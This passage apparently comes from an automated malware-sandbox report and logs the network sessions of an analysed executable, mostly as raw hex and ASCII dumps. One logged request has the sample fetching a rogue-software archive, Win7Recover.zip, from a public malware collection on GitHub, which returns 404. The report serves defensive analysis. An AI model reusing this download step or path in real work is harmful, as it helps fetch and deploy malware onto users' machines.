                                                                                                                                                    2022-09-29 12:59:27 UTC38018INData Raw: e1 3e 5c 7f d8 a1 1e cb 61 ad 57 cb 56 24 10 c6 90 38 c7 f1 28 04 de 1a d4 68 b8 60 1b 3b ce 5c 01 96 bf 9e db 94 75 5d 51 ba 8e 6d 8c 99 e5 82 19 42 fc 52 24 48 40 3c b7 a8 19 ad 85 9e fb 4b 05 4f 5d 1e ec 3d 61 64 38 e8 71 fe 08 2b b1 63 e5 1a 6c 7c 02 34 55 de 85 c1 73 8e a2 8a 59 c6 50 e0 61 85 1d 35 5d f1 35 34 dc f2 d1 30 9b a8 34 21 bf 94 c8 7b b0 b1 cf fb 2c 3d 9e 45 ef e3 e6 e7 2c e3 19 e2 6f 83 10 ba 98 c5 dd 61 b3 b1 63 e5 a6 0b c4 f6 11 09 4c 49 4c 17 19 48 21 fe 7d 3e 77 4a 6d 0d fe 9e f6 f3 e3 6d fc 47 a4 02 f5 a7 68 6a d8 e0 5d 1a 62 c7 01 d1 45 50 da ff 77 0f 69 ae b4 bd 6e 61 4d 29 fe ad f9 bc 4b e0 c4 f5 79 dc 79 cc 7f 39 7b 0a 7a 1e d3 11 76 54 d6 4c 32 c7 56 77 5b 3e 23 ee 67 50 83 2b 3f 49 d3 69 d8 00 cb 89 6b c7 af 7d 48 a8 1b cd 29
                                                                                                                                                    Data Ascii: >\aWV$8(h`;\u]QmBR$H@<KO]=ad8q+cl|4UsYPa5]5404!{,=E,oacLILH!}>wJmmGhj]bEPwinaM)Kyy9{zvTL2Vw[>#gP+?Iik}H)
                                                                                                                                                    2022-09-29 12:59:27 UTC38034INData Raw: 44 9e 7a 0f 6c 06 ab 0c 95 24 fa ff f7 73 0f 04 87 47 49 34 a7 d4 00 e8 6d 6e 3c 7d 49 72 0b 2a e8 e0 c8 dd 68 82 19 19 cb e0 a7 54 fc 21 4d 62 24 39 e6 f5 07 75 33 93 6b a8 f8 3f ce 68 1f 94 02 45 ab 55 aa 82 89 d5 08 fe 21 4d fc 66 e7 96 49 39 f2 ee b6 a4 2e 2b 72 0d 27 36 54 e5 9a 19 10 5b 4e 8f dc d4 5d 2d c3 84 66 ad 3e 1a 38 f7 6f ae 8c 4f b5 ff d9 ba 73 71 f0 f3 fd 47 c8 29 08 21 ce 63 85 9a 9e 57 08 36 d9 cf 41 e1 45 7b 98 97 61 3b 76 3e 58 c4 41 9a 38 38 f2 58 9f a8 82 f5 bf 7b e8 8e 83 04 4a 9c 1a 62 a8 46 fc f2 f3 b2 c5 24 e4 8e b3 6f a7 92 fd 57 39 dd 1f 02 64 d8 6f d9 d9 ad c5 15 d1 fe 83 b5 98 2f d1 5d f8 73 98 97 ea 45 d1 47 e0 33 0d 24 c8 24 8b 16 71 45 b4 e5 e0 32 47 1d 34 33 b7 b2 80 2e 6d 66 d9 d3 97 50 54 e9 95 b4 6a 1f f7 2e a3 98 53
                                                                                                                                                    Data Ascii: Dzl$sGI4mn<}Ir*hT!Mb$9u3k?hEU!MfI9.+r'6T[N]-f>8oOsqG)!cW6AE{a;v>XA88X{JbF$oW9do/]sEG3$$qE2G43.mfPTj.S
                                                                                                                                                    2022-09-29 12:59:27 UTC38050INData Raw: 12 c6 ca 2c f5 3a dd b1 04 e9 3d 7c d0 54 ff 29 1b fb 0b 26 ec 2d f0 a0 a3 d7 77 66 25 7f b4 67 7d 56 79 15 71 63 5b 55 bb f5 e4 94 4d fb fa 6a f0 39 a6 22 46 de 7a 7c 7f 31 4d 95 aa 40 23 04 35 fb 5c 2b ad bc 62 0a 53 55 dc 0e f6 10 d1 64 7c 5a 44 48 62 9c a3 3b ed 45 58 5d 76 02 83 07 5b 2f 1b 7e 07 52 d3 fe 74 16 d9 74 a1 f3 79 26 8e 21 f0 09 43 64 4e 1d 6a 70 73 67 ee 42 ca f2 a5 33 bb 52 a1 eb ea f5 1d a0 a9 b9 51 21 4c ca 93 b5 d9 36 73 5c 20 d4 42 98 b7 53 0f b6 c2 e8 7d 79 95 91 5d 56 ff 2c c4 f8 34 57 f0 a9 4d 87 6a 69 97 fb 2e 7a d0 86 33 d7 5a a7 d0 78 67 4e 05 8d bd b0 6e 72 8a e5 03 31 ac 8b 94 1a 38 93 90 3d dd a3 b1 4c bc cf a8 3e 8e e0 71 58 94 a4 47 7b d7 c7 ce 81 57 b5 10 f5 6f 34 86 5f 9c 3d 90 71 b2 1f fc 87 01 87 9d e0 52 0f eb 14 0b
                                                                                                                                                    Data Ascii: ,:=|T)&-wf%g}Vyqc[UMj9"Fz|1M@#5\+bSUd|ZDHb;EX]v[/~Rtty&!CdNjpsgB3RQ!L6s\ BS}y]V,4WMji.z3ZxgNnr18=L>qXG{Wo4_=qR
                                                                                                                                                    2022-09-29 12:59:27 UTC38066INData Raw: 66 40 30 77 ab 6b 8d c9 a9 06 88 38 e6 f9 59 c8 ff b4 aa b1 d1 22 e3 21 f8 a5 8c f1 99 a1 9a 99 2a 78 54 92 fd dc 6e ec df 09 cf 73 02 34 19 a7 0d 4e e9 f7 00 30 bb e8 f4 ab 2f 90 3c c9 fb 87 aa 8a 81 f0 45 69 39 d6 60 c1 4a a2 21 e6 81 27 fa 2c fa ee 8e 77 cf 03 d7 ac 27 da ad f9 7a 04 61 89 50 a0 85 70 55 63 e0 0d f5 3b 3c 4c d5 34 97 45 81 1c 00 2d b4 11 c1 68 aa 71 02 63 6f 68 85 5c 49 0f 02 df 1a d4 cd 5d f4 d6 b9 f5 c2 d7 c0 59 a0 4f 33 40 ea 9e 08 17 50 fe ad d9 35 11 54 29 0b 52 cb 80 50 8b 88 49 e6 12 c0 f2 b4 e1 8f 40 5a ca 2b d1 11 88 b1 0e 65 6b 69 99 65 39 3d 61 9a ea 88 8b 26 08 f5 12 b0 bf 26 19 2c 86 f7 fe 92 df 89 7e 39 d2 d5 ec b3 dd d1 62 0f aa fa 4f 3e a7 bf af 3c fc 77 64 68 fc 28 b1 2d 61 d4 d2 a6 25 9a ea 33 03 8f 0f 97 84 fe c7 8a
                                                                                                                                                    Data Ascii: f@0wk8Y"!*xTns4N0/<Ei9`J!',w'zaPpUc;<L4E-hqcoh\I]YO3@P5T)RPI@Z+ekie9=a&&,~9bO><wdh(-a%3
                                                                                                                                                    2022-09-29 12:59:27 UTC38082INData Raw: e7 db 85 17 bf b8 41 d7 c9 07 c6 24 0e 9b fd 59 4d b1 d6 90 eb d9 7e fe c4 db 24 e1 0c 7e 85 b0 8e 69 64 ce 01 28 d3 3e 82 75 4c aa 87 29 ac bd 89 00 ce f4 54 b3 36 51 18 14 45 47 5b b5 f2 ca 01 38 b5 65 de 7f 2c bd e7 98 f3 68 db 7e ea dd 2c 41 e2 49 ca 15 f1 e0 8b 3c 1d bf 14 a3 b7 3f 12 37 bd 5f fb a0 60 13 79 b7 e8 2d 6c 95 0f 27 f8 02 0d 88 44 b6 6e 55 28 2d 8c 2b 0e c1 ca 39 48 7d fd 0d f4 32 52 ca 4b 58 9f 56 29 49 e7 a3 bc 23 87 ab 44 d2 42 ae 5c 0d 47 f1 9c a7 83 b4 f6 5a 3e e2 2b e8 4a c9 5f ec 46 d7 96 9f fd d0 47 e1 3f bd dc 4e e1 7e 93 5f c6 96 78 f5 f5 13 55 ef 52 85 41 ad e6 a9 e2 18 9d 81 6c 9f 2a 98 dc fe dd c8 07 0b e4 1f 99 df 25 57 57 24 dc 9c 42 68 b4 d8 3b 71 20 1b 2a a8 05 5c c1 47 e2 22 10 55 f9 29 54 d1 36 fd 28 28 64 8c 9c 81 0c
                                                                                                                                                    Data Ascii: A$YM~$~id(>uL)T6QEG[8e,h~,AI<?7_`y-l'DnU(-+9H}2RKXV)I#DB\GZ>+J_FG?N~_xURAl*%WW$Bh;q *\G"U)T6((d
                                                                                                                                                    2022-09-29 12:59:27 UTC38098INData Raw: c7 71 f0 c5 1d f6 74 04 9f 50 26 78 96 4c f6 b6 a1 73 9e 1e 20 20 e1 84 39 67 39 68 45 17 38 5d 9f b8 a8 48 db 72 2a e1 8e f9 52 44 92 69 47 b7 47 96 ad d9 1c 62 f0 37 9d 8b 74 f6 f9 7d a8 48 3d 65 3e 74 0e a3 fd c5 70 40 cc 26 4d 04 bd d1 21 6f 43 d1 07 04 2b 56 4c 0c 39 76 19 26 e3 81 a9 5c b7 24 a2 a6 86 7a 9a a8 03 53 5c 08 87 07 e1 19 e8 58 23 22 d9 6e ba 04 81 fc dc 20 90 6f 68 46 cb 10 fe 87 39 81 95 8e cf 02 89 31 58 f7 20 2a 6a ee 02 b6 ac 52 ad 3d ef 9a d2 2f 00 d6 51 61 fc fb 38 63 4c 8a 41 40 ad 43 ab 90 46 36 0f ec d0 e1 83 85 e8 6b aa f3 9a 60 7b 0c ed 21 d8 ff ec 64 8a ca 41 60 68 9a c3 9d ff 24 5a ca 71 b9 5c 10 ea 53 d1 a2 e4 92 77 8f 21 f2 62 72 c5 1e d4 01 43 08 71 03 e1 2e e4 17 c5 43 61 1b 49 61 f7 70 b6 d4 be a7 35 1d 45 d0 c1 85 c7
                                                                                                                                                    Data Ascii: qtP&xLs 9g9hE8]Hr*RDiGGb7t}H=e>tp@&M!oC+VL9v&\$zS\X#"n ohF91X *jR=/Qa8cLA@CF6k`{!dA`h$Zq\Sw!brCq.CaIap5E
                                                                                                                                                    2022-09-29 12:59:27 UTC38114INData Raw: c5 4f 63 d8 13 37 5c c3 af 65 0f d3 66 32 02 4c 0e 47 c7 a8 7e 3d fc 26 29 c1 40 23 47 7c e4 b8 13 f4 98 1d e8 51 31 58 43 c5 0a 20 ed ae 30 ca c6 48 73 3f ec 3c 33 af 2f 50 e3 8b 46 b1 9f 45 b2 0a 1a 33 1b 94 23 c8 0e 7c 27 f7 67 44 b1 f9 d9 5f 05 9b 4d 27 d0 6a aa 46 50 b9 b4 cf ae e8 24 46 be 1f f1 0f 73 e7 b7 0a a3 3d fc b9 b0 b9 73 f8 96 8e 12 bd 86 34 a8 7a 4b cc ba b8 af 02 3a da 3b a2 89 63 66 a8 da d0 be b3 fc cf 25 84 f0 94 ff d6 76 bd f1 ca 75 57 88 58 07 1c 01 fc 74 fa e1 6b 19 55 a2 79 af 49 4b a0 44 35 d8 73 82 e6 0f cd a6 e3 5d c2 35 e4 61 f7 ac 7c 8e 45 5b 53 40 0b 2d 41 bb 9a 14 9a d5 d7 62 11 cc dc 0b 6e d1 58 72 c3 c9 37 bf 34 bd e2 14 c1 3b 7f b1 86 91 ec 27 e3 48 1a 86 b6 21 06 3a ea 27 8e 74 f9 ed 3f 0d 49 3d d5 0b b4 e8 3e 1c 81 ac
                                                                                                                                                    Data Ascii: Oc7\ef2LG~=&)@#G|Q1XC 0Hs?<3/PFE3#|'gD_M'jFP$Fs=s4zK:;cf%vuWXtkUyIKD5s]5a|E[S@-AbnXr74;'H!:'t?I=>
                                                                                                                                                    2022-09-29 12:59:27 UTC38130INData Raw: 84 89 39 d5 42 49 00 09 d8 c0 68 28 78 48 62 01 d5 8f ef 4d 13 7c 15 5a 55 a6 dc fa 45 86 12 b3 e7 ef 14 2e f0 b3 74 64 5f 97 24 d7 7f cc 6f 40 cc cb c9 cc cc 0b b1 ba 64 65 a0 ea b8 be d1 38 c5 36 31 90 da 96 13 44 2a f3 d4 58 4e ab 64 97 43 f6 c4 93 77 c8 8c 79 e6 e4 c5 07 f8 1c 92 c0 a9 a6 c1 91 6d 51 0e 8c 75 3b af d1 c7 a3 37 06 b2 e6 0d f7 6d 70 b4 55 7b 03 2f 67 95 88 e8 bd f6 65 59 15 40 4a 33 ff 67 91 db 8f 8d be 3c c1 a2 ee 91 ef bb ed 9f 11 b3 9a 6c 40 75 09 1c 9e 05 1e cc 54 7f 06 0e 2b bb ae dd d6 6d 58 09 81 6a 80 0a e2 c9 49 0b fb ad f6 fa fb b6 26 da 6c a4 5e 26 dd d0 e9 af b5 59 e0 3a c8 09 7a b7 ad 2d 0f 2f 5a 43 8a 93 e7 e1 3c 7b 48 a0 50 b2 dd 3a cf 23 e2 c2 63 11 92 e9 cc 60 38 56 97 c5 1a 9b 8a c7 c7 d0 7f b2 2d 4a e3 a8 82 10 28 35
                                                                                                                                                    Data Ascii: 9BIh(xHbM|ZUE.td_$o@de861D*XNdCwymQu;7mpU{/geY@J3g<l@uT+mXjI&l^&Y:z-/ZC<{HP:#c`8V-J(5
                                                                                                                                                    2022-09-29 12:59:27 UTC38146INData Raw: d9 f1 b1 bc ad c2 8c 63 28 37 39 5c 35 c0 10 c5 c3 75 2d e5 9c 77 34 a3 ba e5 d6 c8 39 ac 43 ab 32 33 4b 3a 9a 9a 7b d7 9f 0a b2 bb 56 fd f3 31 75 0b db fc 03 ae 9d 3b 20 74 66 32 e6 a0 97 49 b2 c8 b6 d8 9b 20 53 27 7b 37 db 06 ac 1c 3c dc 8d 80 da cb 3f c0 d3 03 b6 c6 a3 b7 18 00 6c f9 f9 6b c1 67 a8 b2 aa de 89 62 59 51 5e 80 86 50 b2 a1 1c 93 c5 e5 a2 06 67 74 7c 05 6a 02 c7 e4 dd 2c 09 2c a5 81 a3 a6 91 ac 20 c6 72 49 b6 21 ed 0b 61 39 f8 f4 66 de f4 87 67 8e cb 96 21 5a bc 20 4a 39 a2 8a 7f 25 06 92 23 c8 01 5a 1d 95 65 27 3b a4 27 dd 62 d5 fc ef fb 62 a5 62 2c 3f b7 b4 d3 ff d2 a7 82 8c 22 1d 77 ec a0 ba b8 d1 79 b2 20 80 d3 2f 51 38 9e 9a c0 cb 26 5d 0e 31 cd c0 80 d4 86 f7 f5 f9 84 97 92 a2 1a 6a 48 69 6a fb fa 22 12 31 38 f6 c5 c6 cc 45 ff 49 90
                                                                                                                                                    Data Ascii: c(79\5u-w49C23K:{V1u; tf2I S'{7<?lkgbYQ^Pgt|j,, rI!a9fg!Z J9%#Ze';'bbb,?"wy /Q8&]1jHij"18EI
                                                                                                                                                    2022-09-29 12:59:27 UTC38162INData Raw: 6e 25 be f6 c3 54 39 69 36 c9 64 5a 41 a8 76 ce f5 12 86 36 fa a9 eb a6 7e af 75 d2 f7 c6 04 17 82 3b 42 92 14 c1 2f eb 54 88 86 f9 26 e3 9b f8 a8 ec 07 e9 17 59 bc d8 fd 7c 78 d8 1b 89 fb 2a dc d4 bb c7 e1 d4 90 87 82 23 d5 70 39 37 93 b1 08 0d 7d d8 f5 b4 64 b2 92 43 62 38 d9 ef 56 f0 b3 ca 70 64 af 75 46 e9 56 d2 ad e5 e2 32 8a ed f3 d1 f3 1f 3e cd 86 b5 6d 4b 49 92 f7 59 ef d8 15 60 aa 31 8c d2 be 12 72 c5 c9 f9 44 50 0f b0 a1 e6 b0 4b b0 40 64 80 56 fd 5f d1 ae 00 66 eb 14 ff 09 26 0b 3d 91 d6 f2 60 3e 2d c1 cc 5c 8b 5a 96 31 bf ef a0 6a 33 04 74 f0 1a c7 a7 60 27 fd d8 2e 6b ba 7b 71 b2 c4 05 b7 a0 14 94 04 bf 70 5d b2 89 6b 73 c2 ed 0d 18 14 da 04 a5 fa d4 9d 39 eb 79 31 bf 89 09 d9 2a a4 5b 73 c2 dc 05 9e 02 14 f7 1e 6a ca 6f 2b c5 6b e5 5d dd d6
                                                                                                                                                    Data Ascii: n%T9i6dZAv6~u;B/T&Y|x*#p97}dCb8VpduFV2>mKIY`1rDPK@dV_f&=`>-\Z1j3t`'.k{qp]ks9y1*[sjo+k]


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    141192.168.2.349778140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:27 UTC38166OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    142140.82.121.3443192.168.2.349778C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:27 UTC38166INHTTP/1.1 404 Not Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:27 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:27 UTC38166INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                                    2022-09-29 12:59:27 UTC38168INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                                                                                    2022-09-29 12:59:27 UTC38168INData Raw: 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65
                                                                                                                                                    Data Ascii: <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/asse
                                                                                                                                                    2022-09-29 12:59:27 UTC38170INData Raw: 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69
                                                                                                                                                    Data Ascii: igin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.gi
                                                                                                                                                    2022-09-29 12:59:27 UTC38171INData Raw: 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 64 33 35 31 66 36 2d 63 31 64 36 33 64 32 33 30 62 32 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 36 38 38 66 63 32 38 33 66 64 34 2e 6a
                                                                                                                                                    Data Ascii: s_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-d351f6-c1d63d230b29.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-0688fc283fd4.j
                                                                                                                                                    2022-09-29 12:59:27 UTC38172INData Raw: 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 33 38 63 33 36 61 35 39 37 31 38 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65
                                                                                                                                                    Data Ascii: b_index_js-node_modules_github_time-elements_dist_index_js-38c36a597184.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-eleme
                                                                                                                                                    2022-09-29 12:59:27 UTC38174INData Raw: 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 70 61 73 74 65 2d 6d 61 72 6b 64 6f 77 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6b 6f 64 64 73 73 6f 6e 5f 74 65 78 74 61 72 65 61 2d 63 2d 35 38 36 66 37 38 2d 61 61 64 30 66 61 30 31 63 37 39 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22
                                                                                                                                                    Data Ascii: nymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_koddsson_textarea-c-586f78-aad0fa01c792.js"></script><script crossorigin="anonymous"
                                                                                                                                                    2022-09-29 12:59:27 UTC38175INData Raw: 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72
                                                                                                                                                    Data Ascii: crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossor
                                                                                                                                                    2022-09-29 12:59:27 UTC38176INData Raw: 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6b 51 79 51 54 59 36 4d 54 45 77 51 6b 59 36 4d 6b 45 78 4e 55 4a 44 52 6a 6f 79 51 6a 41 35 4e 54 4a 47 4f 6a 59 7a 4d 7a 55 35 4e 6b 46 47 49 69 77 69 64 6d 6c 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 55 30 4f 44 4d 34 4d 54 45 77 4d 7a 59 34 4e 54 59 32 4f 44 59 79 4e 54 55 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 35 6b 5a 58 49 69 4f 69 4a 70 59 57 51 69 66 51 3d 3d 22 20 64 61 74 61 2d 74 75 72 62 